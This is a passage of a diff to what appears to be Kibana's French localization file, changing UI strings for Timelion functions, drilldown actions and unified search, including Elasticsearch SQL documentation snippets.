 "timelion.help.functions.static.args.labelHelpText": "Une manière rapide de définir l'étiquette pour la série. Vous pouvez également utiliser la fonction .label().",
 "timelion.help.functions.static.args.valueHelpText": "La valeur unique à afficher. Vous pouvez également passer plusieurs valeurs, elles seront interpolées uniformément sur la plage temporelle.",
@@ -5699,78 +4842,194 @@ "timelion.help.functions.sumHelpText": "Ajoute les valeurs d'une ou de plusieurs séries d'une liste de séries à chaque position, dans chaque série, de la liste de séries d'entrée.", "timelion.help.functions.title.args.titleHelpText": "Titre pour le tracé.", "timelion.help.functions.titleHelpText": "Ajoute un titre en haut du tracé. En cas d’appel sur plusieurs listes de séries, le dernier appel est utilisé.", - "timelion.help.functions.trend.args.endHelpText": "Quand arrêter de calculer par rapport au début ou à la fin. Par exemple, -10 indique qu'il faut arrêter de calculer 10 points avant la fin, et +15 indique que le calcul doit s'arrêter 15 points après le début. Par défaut : 0", - "timelion.help.functions.trend.args.modeHelpText": "L'algorithme à utiliser pour générer la courbe de tendance. L'une des options suivantes : {validRegressions}.", - "timelion.help.functions.trend.args.startHelpText": "Quand commencer à calculer par rapport au début ou à la fin. Par exemple, -10 indique qu'il faut commencer à calculer 10 points avant la fin, et +15 indique que le calcul doit commencer 15 points après le début. Par défaut : 0", + "timelion.help.functions.trend.args.endHelpText": "Quand arrêter de calculer par rapport au début ou à la fin. Par exemple, -10 indique qu'il faut arrêter de calculer 10 points avant la fin, et +15 indique que le calcul doit s'arrêter 15 points après le début. Par défaut : 0", + "timelion.help.functions.trend.args.startHelpText": "Quand commencer à calculer par rapport au début ou à la fin. Par exemple, -10 indique qu'il faut commencer à calculer 10 points avant la fin, et +15 indique que le calcul doit commencer 15 points après le début. Par défaut : 0", "timelion.help.functions.trendHelpText": "Dessine une courbe de tendance à l'aide d'un algorithme de régression spécifié.", - "timelion.help.functions.trim.args.endHelpText": "Compartiments à retirer de la fin de la série. 
Par défaut : 1", - "timelion.help.functions.trim.args.startHelpText": "Compartiments à retirer du début de la série. Par défaut : 1", - "timelion.help.functions.trimHelpText": "Définir N compartiments au début ou à la fin de la série sur null pour ajuster le \"problème de compartiment partiel\"", - "timelion.help.functions.worldbank.args.codeHelpText": "Chemin de l'API Worldbank (Banque mondiale). Il s'agit généralement de tout ce qui suit le domaine, avant la chaîne de requête. Par exemple : {apiPathExample}.", - "timelion.help.functions.worldbankHelpText": "\n [expérimental]\n Extrayez des données de {worldbankUrl} à l'aide du chemin d’accès aux séries.\n La Banque mondiale fournit surtout des données annuelles et n'a souvent aucune donnée pour l'année en cours.\n Essayez {offsetQuery} si vous n’obtenez pas de données pour les plages temporelles récentes.", - "timelion.help.functions.worldbankIndicators.args.countryHelpText": "Identifiant de pays de la Banque mondiale. Généralement le code à 2 caractères du pays.", - "timelion.help.functions.worldbankIndicators.args.indicatorHelpText": "Le code d'indicateur à utiliser. Vous devrez le rechercher sur {worldbankUrl}. Souvent très complexe. Par exemple, {indicatorExample} correspond à la population.", - "timelion.help.functions.worldbankIndicatorsHelpText": "\n [expérimental]\n Extrayez des données de {worldbankUrl} à l'aide du nom et de l'indicateur du pays. La Banque mondiale fournit\n surtout des données annuelles et n'a souvent aucune donnée pour l'année en cours. Essayez {offsetQuery} si vous n’obtenez pas de données pour\n les plages temporelles récentes.", + "timelion.help.functions.trim.args.endHelpText": "Compartiments à retirer de la fin de la série. Par défaut : 1", + "timelion.help.functions.trim.args.startHelpText": "Compartiments à retirer du début de la série. 
Par défaut : 1", + "timelion.help.functions.trimHelpText": "Définir N compartiments au début ou à la fin de la série sur null pour ajuster le \"problème de compartiment partiel\"", + "timelion.help.functions.worldbankIndicators.args.countryHelpText": "Identifiant de pays de la Banque mondiale. Généralement le code à 2 caractères du pays.", "timelion.help.functions.yaxis.args.colorHelpText": "Couleur de l'étiquette de l'axe", "timelion.help.functions.yaxis.args.labelHelpText": "Étiquette de l'axe", "timelion.help.functions.yaxis.args.maxHelpText": "Valeur max.", "timelion.help.functions.yaxis.args.minHelpText": "Valeur min.", "timelion.help.functions.yaxis.args.positionHelpText": "gauche ou droite", - "timelion.help.functions.yaxis.args.tickDecimalsHelpText": "Le nombre de décimales pour les étiquettes de graduation de l'axe Y.", - "timelion.help.functions.yaxis.args.unitsHelpText": "La fonction à utiliser pour mettre en forme les étiquettes de l'axe Y. L'une des options suivantes : {formatters}.", - "timelion.help.functions.yaxis.args.yaxisHelpText": "L'axe Y numéroté sur lequel tracer cette série, par exemple .yaxis(2) pour un deuxième axe Y.", - "timelion.help.functions.yaxisHelpText": "Configure une variété d'options pour l'axe Y, la plus importante étant sans doute celle permettant d'ajouter un énième (par ex. deuxième) axe Y.", - "timelion.noFunctionErrorMessage": "Fonction inconnue : {name}", + "timelion.help.functions.yaxis.args.tickDecimalsHelpText": "Le nombre de décimales pour les étiquettes de graduation de l'axe Y.", + "timelion.help.functions.yaxis.args.yaxisHelpText": "L'axe Y numéroté sur lequel tracer cette série, par exemple .yaxis(2) pour un deuxième axe Y.", + "timelion.help.functions.yaxisHelpText": "Configure une variété d'options pour l'axe Y, la plus importante étant sans doute celle permettant d'ajouter un énième (par ex. 
deuxième) axe Y.", "timelion.panels.timechart.unknownIntervalErrorMessage": "Intervalle inconnu", "timelion.requestHandlerErrorTitle": "Erreur de requête Timelion", - "timelion.serverSideErrors.argumentsOverflowErrorMessage": "Trop d'arguments transmis à : {functionName}", - "timelion.serverSideErrors.bucketsOverflowErrorMessage": "Nombre max. de compartiments dépassé : {bucketCount} sur {maxBuckets} autorisés. Sélectionnez un intervalle plus grand ou une période plus courte.", "timelion.serverSideErrors.colorFunction.colorNotProvidedErrorMessage": "couleur non spécifiée", "timelion.serverSideErrors.conditionFunction.unknownOperatorErrorMessage": "Opérateur inconnu", "timelion.serverSideErrors.conditionFunction.wrongArgTypeErrorMessage": "doit être un nombre ou une liste de séries", - "timelion.serverSideErrors.errorInCell": " dans la cellule no {number} : {message}", - "timelion.serverSideErrors.esFunction.indexNotFoundErrorMessage": "Index Elasticsearch introuvable : {index}", - "timelion.serverSideErrors.holtFunction.missingParamsErrorMessage": "Vous devez spécifier une longueur de saison et une taille d'échantillon >= 2.", - "timelion.serverSideErrors.holtFunction.notEnoughPointsErrorMessage": "Au moins 2 points sont nécessaires pour utiliser le lissage exponentiel double.", - "timelion.serverSideErrors.movingaverageFunction.notValidPositionErrorMessage": "Les positions valides sont : {validPositions}.", - "timelion.serverSideErrors.movingstdFunction.notValidPositionErrorMessage": "Les positions valides sont : {validPositions}.", - "timelion.serverSideErrors.pointsFunction.notValidSymbolErrorMessage": "Les symboles valides sont : {validSymbols}.", - "timelion.serverSideErrors.sheetParseErrorMessage": "Attendu : {expectedDescription} au caractère {column}", - "timelion.serverSideErrors.unknownArgumentErrorMessage": "Argument inconnu pour {functionName} : {argumentName}", - "timelion.serverSideErrors.unknownArgumentTypeErrorMessage": "Type d'argument non pris en 
charge : {argument}", - "timelion.serverSideErrors.worldbankFunction.noDataErrorMessage": "La requête à la Banque mondiale a réussi, mais il n'y a pas de données pour {code}.", - "timelion.serverSideErrors.wrongFunctionArgumentTypeErrorMessage": "{functionName}({argumentName}) doit être l'une des options suivantes : {requiredTypes}. Obtenu : {actualType}", - "timelion.serverSideErrors.yaxisFunction.notSupportedUnitTypeErrorMessage": "{units} n'est pas un type d'unité pris en charge.", + "timelion.serverSideErrors.holtFunction.missingParamsErrorMessage": "Vous devez spécifier une longueur de saison et une taille d'échantillon >= 2.", + "timelion.serverSideErrors.holtFunction.notEnoughPointsErrorMessage": "Au moins 2 points sont nécessaires pour utiliser le lissage exponentiel double.", "timelion.serverSideErrors.yaxisFunction.notValidCurrencyFormatErrorMessage": "La devise doit être un code à trois caractères.", "timelion.timelionDescription": "Affichez des données temporelles sur un graphe.", - "timelion.uiSettings.defaultIndexDescription": "Index Elasticsearch par défaut dans lequel rechercher avec {esParam}", "timelion.uiSettings.defaultIndexLabel": "Index par défaut", "timelion.uiSettings.maximumBucketsDescription": "Le nombre maximal de compartiments qu'une source de données unique peut renvoyer", "timelion.uiSettings.maximumBucketsLabel": "Nombre maximal de compartiments", "timelion.uiSettings.minimumIntervalDescription": "Le plus petit intervalle qui sera calculé lors de l'utilisation de l'option \"auto\"", "timelion.uiSettings.minimumIntervalLabel": "Intervalle minimal", "timelion.uiSettings.targetBucketsDescription": "Le nombre de compartiments visé lors de l'utilisation d'intervalles automatiques", - "timelion.uiSettings.targetBucketsLabel": "Compartiments cibles", - "timelion.uiSettings.timeFieldDescription": "Champ par défaut contenant un horodatage lors de l'utilisation de {esParam}", + "timelion.uiSettings.targetBucketsLabel": "Nombre de compartiments 
cible", "timelion.uiSettings.timeFieldLabel": "Champ temporel", "timelion.vis.expressionLabel": "Expression Timelion", "timelion.vis.interval.auto": "Auto", - "timelion.vis.interval.day": "1 jour", - "timelion.vis.interval.hour": "1 heure", - "timelion.vis.interval.minute": "1 minute", - "timelion.vis.interval.month": "1 mois", - "timelion.vis.interval.second": "1 seconde", - "timelion.vis.interval.week": "1 semaine", - "timelion.vis.interval.year": "1 an", + "timelion.vis.interval.day": "1 jour", + "timelion.vis.interval.hour": "1 heure", + "timelion.vis.interval.minute": "1 minute", + "timelion.vis.interval.month": "1 mois", + "timelion.vis.interval.second": "1 seconde", + "timelion.vis.interval.week": "1 semaine", + "timelion.vis.interval.year": "1 an", "timelion.vis.intervalLabel": "Intervalle", "timelion.vis.invalidIntervalErrorMessage": "Format d'intervalle non valide.", - "timelion.vis.selectIntervalHelpText": "Choisissez une option ou créez une valeur personnalisée. Exemples : 30s, 20m, 24h, 2d, 1w, 1M", + "timelion.vis.selectIntervalHelpText": "Choisissez une option ou créez une valeur personnalisée. 
Exemples : 30s, 20m, 24h, 2d, 1w, 1M", "timelion.vis.selectIntervalPlaceholder": "Choisir un intervalle", - "uiActions.actionPanel.more": "Plus", - "uiActions.actionPanel.title": "Options", - "uiActions.errors.incompatibleAction": "Action non compatible", - "uiActions.triggers.rowClickkDescription": "Un clic sur une ligne de tableau", - "uiActions.triggers.rowClickTitle": "Clic sur ligne de tableau", + "uiActionsEnhanced.components.DrilldownTable.deleteDrilldownsButtonLabel": "Supprimer ({count})", + "uiActionsEnhanced.components.DrilldownTemplateTable.copyButtonLabel": "Copier ({count})", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.invalidDrilldownType": "Le type de recherche {type} n'existe pas", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownCreatedTitle": "Recherche \"{drilldownName}\" créée", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownEditedTitle": "Recherche \"{drilldownName}\" mise à jour", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownsDeletedTitle": "{n} recherches supprimées", + "uiActionsEnhanced.drilldowns.containers.drilldownList.copyingNotification.body": "{count, number} {count, plural, one {recherche} other {recherches}} copiée(s).", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlTemplatePlaceholderText": "Exemple : {exampleUrl}", + "uiActionsEnhanced.drilldowns.urlDrilldownValidation.urlFormatErrorMessage": "Format non valide : {message}", + "uiActionsEnhanced.drilldowns.urlDrilldownValidation.urlFormatGeneralErrorMessage": "Format non valide. Exemple : {exampleUrl}", + "uiActionsEnhanced.components.actionWizard.betaActionLabel": "Bêta", + "uiActionsEnhanced.components.actionWizard.betaActionTooltip": "Cette action est en version bêta et susceptible d'être modifiée. 
La conception et le code sont moins matures que les fonctionnalités officielles en disponibilité générale et sont fournis tels quels sans aucune garantie. Les fonctionnalités bêta ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale. Nous vous remercions de bien vouloir nous aider en nous signalant les bugs ou en nous envoyant d'autres commentaires.", + "uiActionsEnhanced.components.actionWizard.changeButton": "Modifier", + "uiActionsEnhanced.components.actionWizard.insufficientLicenseLevelTooltip": "Niveau de licence insuffisant", + "uiActionsEnhanced.components.actionWizard.triggerPickerHelpText": "Qu'est-ce que c'est ?", + "uiActionsEnhanced.components.actionWizard.triggerPickerHelpTooltip": "Détermine quand la recherche s'affiche dans le menu contextuel", + "uiActionsEnhanced.components.actionWizard.triggerPickerLabel": "Afficher l'option sur :", + "uiActionsEnhanced.components.DrilldownForm.betaActionLabel": "Bêta", + "uiActionsEnhanced.components.DrilldownForm.betaActionTooltip": "Cette action est en version bêta et susceptible d'être modifiée. La conception et le code sont moins matures que les fonctionnalités officielles en disponibilité générale et sont fournis tels quels sans aucune garantie. Les fonctionnalités bêta ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale. 
Nous vous remercions de bien vouloir nous aider en nous signalant les bugs ou en nous envoyant d'autres commentaires.", + "uiActionsEnhanced.components.DrilldownForm.changeButton": "Modifier", + "uiActionsEnhanced.components.DrilldownForm.drilldownAction": "Action", + "uiActionsEnhanced.components.DrilldownForm.getMoreActionsLinkLabel": "Obtenir plus d'actions", + "uiActionsEnhanced.components.DrilldownForm.nameOfDrilldown": "Nom", + "uiActionsEnhanced.components.DrilldownForm.trigger": "Déclencher", + "uiActionsEnhanced.components.DrilldownForm.untitledDrilldown": "Recherche sans titre", + "uiActionsEnhanced.components.DrilldownTable.actionColumnTitle": "Action", + "uiActionsEnhanced.components.DrilldownTable.copyDrilldownButtonLabel": "Copier", + "uiActionsEnhanced.components.DrilldownTable.createDrilldownButtonLabel": "Créer", + "uiActionsEnhanced.components.DrilldownTable.editDrilldownButtonLabel": "Modifier", + "uiActionsEnhanced.components.DrilldownTable.nameColumnTitle": "Nom", + "uiActionsEnhanced.components.DrilldownTable.selectThisDrilldownCheckboxLabel": "Sélectionner cette recherche", + "uiActionsEnhanced.components.DrilldownTable.triggerColumnTitle": "Déclencher", + "uiActionsEnhanced.components.DrilldownTemplateTable.actionColumnTitle": "Action", + "uiActionsEnhanced.components.DrilldownTemplateTable.nameColumnTitle": "Nom", + "uiActionsEnhanced.components.DrilldownTemplateTable.selectableMessage": "Sélectionner ce modèle", + "uiActionsEnhanced.components.DrilldownTemplateTable.singleItemCopyAction": "Copier", + "uiActionsEnhanced.components.DrilldownTemplateTable.sourceColumnTitle": "Panneau", + "uiActionsEnhanced.components.DrilldownTemplateTable.triggerColumnTitle": "Déclencher", + "uiActionsEnhanced.components.TriggerLineItem.incompatibleTooltip": "Ce type de déclenchement n'est pas pris en charge par ce panneau", + "uiActionsEnhanced.components.TriggerPickerItem.unknown": "Inconnu", + "uiActionsEnhanced.CustomActions": "Actions personnalisées", + 
"uiActionsEnhanced.customizePanelTimeRange.modal.addToPanelButtonTitle": "Ajouter au panneau", + "uiActionsEnhanced.customizePanelTimeRange.modal.cancelButtonTitle": "Annuler", + "uiActionsEnhanced.customizePanelTimeRange.modal.optionsMenuForm.panelTitleFormRowLabel": "Plage temporelle", + "uiActionsEnhanced.customizePanelTimeRange.modal.removeButtonTitle": "Retirer", + "uiActionsEnhanced.customizePanelTimeRange.modal.updatePanelTimeRangeButtonTitle": "Mettre à jour", + "uiActionsEnhanced.customizeTimeRange.modal.headerTitle": "Personnaliser la plage temporelle du panneau", + "uiActionsEnhanced.customizeTimeRangeMenuItem.displayName": "Personnaliser la plage temporelle", + "uiActionsEnhanced.drilldownManager.containers.TemplatePicker.label": "Copier la recherche existante", + "uiActionsEnhanced.drilldowns.components.DrilldownHelloBar.helpText": "Les recherches vous permettent de définir de nouveaux comportements pour l'interaction avec les panneaux. Vous pouvez ajouter plusieurs actions et remplacer le filtre par défaut.", + "uiActionsEnhanced.drilldowns.components.DrilldownHelloBar.hideHelpButtonLabel": "Masquer", + "uiActionsEnhanced.drilldowns.components.DrilldownHelloBar.viewDocsLinkLabel": "Afficher les documents", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.createDrilldownTitle": "Créer une recherche", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.deleteDrilldownButtonLabel": "Supprimer une recherche", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.editDrilldownTitle": "Modifier une recherche", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.insufficientLicenseLevelError": "Niveau de licence insuffisant", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownCreatedText": "Enregistrez votre tableau de bord avant de tester.", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownDeletedText": "Enregistrez votre tableau de bord avant de 
tester.", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownDeletedTitle": "Recherche supprimée", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownEditedText": "Enregistrez votre tableau de bord avant de tester.", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownsCRUDErrorTitle": "Erreur lors de l'enregistrement de la recherche", + "uiActionsEnhanced.drilldowns.components.flyoutDrilldownWizard.toast.drilldownsDeletedText": "Enregistrez votre tableau de bord avant de tester.", + "uiActionsEnhanced.drilldowns.components.FlyoutFrame.BackButtonLabel": "Retour", + "uiActionsEnhanced.drilldowns.components.FlyoutFrame.CloseButtonLabel": "Fermer", + "uiActionsEnhanced.drilldowns.containers.createDrilldownForm.primaryButton": "Créer une recherche", + "uiActionsEnhanced.drilldowns.containers.createDrilldownForm.title": "Créer une recherche", + "uiActionsEnhanced.drilldowns.containers.drilldownList.copyingNotification.dismiss": "Rejeter", + "uiActionsEnhanced.drilldowns.containers.DrilldownManager.createNew": "Créer nouvelle", + "uiActionsEnhanced.drilldowns.containers.DrilldownManager.manage": "Gérer", + "uiActionsEnhanced.drilldowns.containers.editDrilldownForm.primaryButton": "Enregistrer", + "uiActionsEnhanced.drilldowns.containers.editDrilldownForm.title": "Modifier une recherche", + "uiActionsEnhanced.drilldowns.drilldownManager.state.defaultTitle": "Recherches", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.additionalOptions": "Options supplémentaires", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.addVariableButtonTitle": "Ajouter une variable", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.encodeDescription": "Si elle est activée, l'URL sera précédée de l’encodage-pourcent comme caractère d'échappement", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.encodeUrl": "Encoder l'URL", + 
"uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.openInNewTabLabel": "Ouvrir dans une nouvelle fenêtre", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlPreviewHelpText": "Veuillez noter que dans l'aperçu, les variables \\{\\{event.*\\}\\} sont remplacées par des valeurs factices.", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlPreviewLabel": "Aperçu de l'URL :", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlPreviewLinkText": "Aperçu", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlTemplateLabel": "Entrer l'URL", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlTemplateSyntaxHelpLinkText": "Aide pour la syntaxe", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlTemplateVariablesFilterPlaceholderText": "Variables de filtre", + "uiActionsEnhanced.drilldowns.urlDrilldownCollectConfig.urlTemplateVariablesHelpLinkText": "Aide", + "unifiedSearch.filter.filterBar.filterItemBadgeIconAriaLabel": "Supprimer {filter}", + "unifiedSearch.filter.filterBar.labelErrorInfo": "Modèle d'indexation {indexPattern} introuvable", + "unifiedSearch.filter.filterBar.labelWarningInfo": "Le champ {fieldName} n'existe pas dans la vue en cours.", + "unifiedSearch.kueryAutocomplete.andOperatorDescription": "Nécessite que {bothArguments} soient ''vrai''.", + "unifiedSearch.kueryAutocomplete.equalOperatorDescription": "{equals} une certaine valeur", + "unifiedSearch.kueryAutocomplete.existOperatorDescription": "{exists} sous un certain format", + "unifiedSearch.kueryAutocomplete.greaterThanOperatorDescription": "est {greaterThan} une certaine valeur", + "unifiedSearch.kueryAutocomplete.greaterThanOrEqualOperatorDescription": "est {greaterThanOrEqualTo} une certaine valeur", + "unifiedSearch.kueryAutocomplete.lessThanOperatorDescription": "est {lessThan} une certaine valeur", + "unifiedSearch.kueryAutocomplete.lessThanOrEqualOperatorDescription": "est {lessThanOrEqualTo} une certaine valeur", + 
"unifiedSearch.kueryAutocomplete.orOperatorDescription": "Nécessite qu’{oneOrMoreArguments} soit ''vrai''.", + "unifiedSearch.query.queryBar.comboboxAriaLabel": "Rechercher et filtrer la page {pageType}", + "unifiedSearch.query.queryBar.KQLNestedQuerySyntaxInfoText": "Il semblerait que votre requête porte sur un champ imbriqué. Selon le résultat visé, il existe plusieurs façons de construire une syntaxe KQL pour des requêtes imbriquées. Apprenez-en plus avec notre {link}.", + "unifiedSearch.query.queryBar.searchInputAriaLabel": "Commencer à taper pour rechercher et filtrer la page {pageType}", + "unifiedSearch.query.queryBar.searchInputPlaceholder": "Filtrer vos données à l'aide de la syntaxe {language}", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.header": "Référence de {language}", + "unifiedSearch.query.textBasedLanguagesEditor.documentationTooltip": "Référence de {lang}", + "unifiedSearch.query.textBasedLanguagesEditor.errorCount": "{count} {count, plural, one {erreur} other {erreurs}}", + "unifiedSearch.query.textBasedLanguagesEditor.lineCount": "{count} {count, plural, one {ligne} other {lignes}}", + "unifiedSearch.query.textBasedLanguagesEditor.lineNumber": "Ligne {lineNumber}", + "unifiedSearch.search.searchBar.savedQueryPopoverConfirmDeletionTitle": "Supprimer \"{savedQueryName}\" ?", + "unifiedSearch.search.searchBar.savedQueryPopoverSaveChangesButtonAriaLabel": "Enregistrer les modifications apportées à {title}", + "unifiedSearch.search.unableToGetSavedQueryToastTitle": "Impossible de charger la requête enregistrée {savedQueryId}", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.addOperator.markdown": "### Add (+)\n```\nSELECT 1 + 1 AS x\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.andOperator.markdown": "### AND\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no > 10000 AND emp_no < 10005 ORDER BY emp_no LIMIT 5\n```\n ", + 
"unifiedSearch.query.textBasedLanguagesEditor.documentation.averageFunction.markdown": "### AVG\nRetourne la moyenne (moyenne arithmétique) des valeurs entrées.\n```\nAVG(numeric_field)\n```\n- champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n```\nSELECT AVG(salary) AS avg FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.between.markdown": "### Between\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no BETWEEN 9990 AND 10003 ORDER BY emp_no\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.comparison.markdown": "### Comparison (<, <=, >, >=)\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no < 10003 ORDER BY emp_no LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.countAllFunction.markdown": "### Count (All)\nRenvoie le nombre total de toutes les valeurs non nulles en entrée. COUNT() et COUNT(ALL ) sont équivalents.\n\n```\nCOUNT(ALL field_name) \n```\n- nom du champ. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n```\nSELECT COUNT(ALL last_name) AS count_all, COUNT(DISTINCT last_name) count_distinct FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.countDistinctFunction.markdown": "### Count (Distinct)\nRenvoie le nombre total de valeurs non nulles distinctes dans les valeurs en entrée.\n\n```\nCOUNT(DISTINCT field_name)\n```\n- Entrée : un nom de champ.\n- Sortie : une valeur numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. 
Sinon, la fonction ignore les valeurs nulles dans ce champ.\n```\nSELECT COUNT(DISTINCT hire_date) unique_hires, COUNT(hire_date) AS hires FROM emp\n\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.countFunction.markdown": "### Count\nRenvoie le nombre total de valeurs en entrée.\n\n\n```\nCOUNT(expression)\n```\n- expression. Nom de champ, caractère générique (*) ou n'importe quelle valeur numérique. Pour COUNT(*) ou COUNT(), toutes les valeurs sont prises en compte, même celles manquantes ou nulles. Pour COUNT(), les valeurs nulles ne sont pas prises en compte.\n```\nSELECT COUNT(*) AS count FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.divideOperator.markdown": "### Divide (/)\n```\nSELECT 6 / 3 AS x\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.equality.markdown": "### Equality (=)\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no = 10000 LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.firstFunction.markdown": "### FIRST / FIRST_VALUE\nRenvoie la première valeur non nulle (si elle existe) de la colonne d'entrée field_name triée selon la colonne ordering_field_name. Si la valeur ordering_field_name n'est pas fournie, seule la colonne field_name est utilisée pour le tri. 
\n\n```\nFIRST(\n field_name \n [, ordering_field_name])\n```\n- Nom du champ : champ cible de l'agrégation\n- ordering_field_name : champ facultatif utilisé pour le tri.\n\n```\nSELECT gender, FIRST(first_name, birth_date) FROM emp GROUP BY gender ORDER BY gender\n```\n\n- FIRST ne peut pas être utilisé dans une clause HAVING.\n- FIRST ne peut pas être utilisé avec des colonnes de type texte, sauf si le champ est aussi enregistré comme mot-clé.\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.inequality.markdown": "### Inequality (<> or !=)\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no <> 10000 ORDER BY emp_no LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.inOperator.markdown": "### IN (, , ...)\n```\nSELECT last_name l FROM \"test_emp\" \nWHERE emp_no IN (10000, 10001, 10002, 999) ORDER BY emp_no LIMIT 5\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.kurtosisFunction.markdown": "### KURTOSIS\nQuantifier la forme de la distribution des valeurs en entrée dans le champ field_name.\n\n```\nKURTOSIS(field_name) \n```\n- champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, KURTOSIS(salary) AS k FROM emp\n```\n\n- KURTOSIS ne peut pas être utilisé en plus des fonctions ou des opérateurs scalaires, uniquement sur un champ. \n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.lastFunction.markdown": "### LAST / LAST_VALUE\nInverse de FIRST/FIRST_VALUE. Renvoie la dernière valeur non nulle (si elle existe) de la colonne d'entrée field_name triée par ordre croissant selon la colonne ordering_field_name. Si la valeur ordering_field_name n'est pas fournie, seule la colonne field_name est utilisée pour le tri. 
\n\n```\nLAST(\n field_name \n [, ordering_field_name])\n```\n- Nom du champ : champ cible de l'agrégation\n- ordering_field_name : champ facultatif utilisé pour le tri.\n```\nSELECT gender, LAST(first_name) FROM emp GROUP BY gender ORDER BY gender\n```\n- LAST ne peut pas être utilisé dans une clause HAVING.\n- LAST ne peut pas être utilisé avec des colonnes de type texte, sauf si le champ est aussi enregistré comme mot-clé.\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.madFunction.markdown": "### MAD\nMesure la variabilité des valeurs d'entrée dans le champ field_name.\n\n```\nMAD(field_name) \n```\n- champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MIN(salary) AS min, MAX(salary) AS max, AVG(salary) AS avg, MAD(salary) AS mad FROM emp\n```\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.markdown": "## Fonctionnement\n\nAvec Elasticsearch SQL, vous avez accès à cette recherche full text, \nà grande vitesse et avec une scalabilité simple, en utilisant une syntaxe de requête familière.\nVous pouvez utiliser SQL pour rechercher et agréger les données de façon native dans Elasticsearch. \nElasticsearch SQL est un peu un outil de traduction, \nqui comprend à la fois SQL et Elasticsearch, et facilite\nla lecture et le traitement des données en temps réel.\n \nExemple de requête SQL :\n \n```\nSELECT * FROM library \nORDER BY page_count DESC LIMIT 5\n```\n \nEn règle générale, comme l'indique le nom Elasticsearch SQL, il propose une interface SQL à Elasticsearch.\nDe ce fait, il suit la terminologie et les conventions SQL partout où c'est possible.\n \nElasticsearch SQL n'accepte actuellement qu'une seule commande à la fois. 
Une commande est une séquence de jetons terminée par la fin du flux d'entrée.\n \nElasticsearch SQL fournit un jeu complet d'opérateurs et de fonctions intégrés.\n \n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.maxFunction.markdown": "### MAX\nRetourne la valeur maximale de toutes les valeurs en entrée dans le champ field_name.\n\n```\nMAX(field_name) \n```\n- champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. Sinon, la fonction ignore les valeurs nulles dans ce champ.\n\n```\nSELECT MAX(salary) AS max FROM emp\n```\n\n- MAX sur un champ de type texte ou mot-clé est traduit en FIRST/FIRST_VALUE et ne peut donc pas être utilisé dans la clause HAVING.\n\n ", + "unifiedSearch.query.textBasedLanguagesEditor.documentation.minFunction.markdown": "### MIN\nRetourne la valeur minimale de toutes les valeurs en entrée dans le champ field_name.\n\n```\nMIN(field_name) \n```\n- champ numérique. Si ce champ contient uniquement des valeurs nulles, la fonction renvoie zéro. 
